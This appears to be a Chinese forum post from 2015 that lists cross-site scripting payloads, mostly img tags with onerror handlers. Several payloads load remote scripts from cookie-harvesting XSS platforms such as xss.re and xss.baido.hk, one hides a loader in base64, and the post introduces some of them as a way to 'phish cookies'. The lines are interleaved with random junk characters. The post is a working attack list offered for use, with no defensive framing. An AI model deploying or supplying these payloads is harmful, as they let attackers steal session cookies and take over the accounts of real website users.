<img src='non-exist.jpg'onerror="alert('xss')">
5 y# ^ U& j8 t7 U3 s8 U<img src=# onerror=alert(123)>+ Q5 I: y1 |$ q6 C8 u' S( M( R
<img src=# onerror=alert(document.cookie)>
3 M- l- d9 ^- z下面是利用平台钓cookie的
- g5 P# b$ k, }7 i7 w! Y8 E <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
4 t, f* W) A8 u% N
0 w' q" d7 M# o6 f% W& C6 s8 i+ c
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
( q! [! S3 l9 M- ]0 v<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img> c5 `7 f2 I) t' C
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
1 d: n2 K& s, h" c& ]<img src=1 onerror=jQuery.getScript("//xss.re/974")>
' ?; o) L: b/ s, o v<img src="#">; ~- g3 K/ u! ~
<img src="#">
4 A( ~ |- h6 i9 w5 \( l/ B+ ~<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
, V( L! m" V1 S5 I% _0 ]<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
0 h0 H; k, F( ^0 F$ ?) i<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
- w. d4 t8 `$ E4 i<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>/ m, h* e; O* h( O6 Y; L
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
8 I; S9 r$ q8 R9 Q6 a5 E8 q* A<img src=x width="0" height="0"></img>1 t& f) L4 M2 j
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>8 @$ X' E% V$ P7 [
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>3 I9 l5 i' t7 R, d
|
发表于 2015-10-18 14:33:54
收藏
支持
反对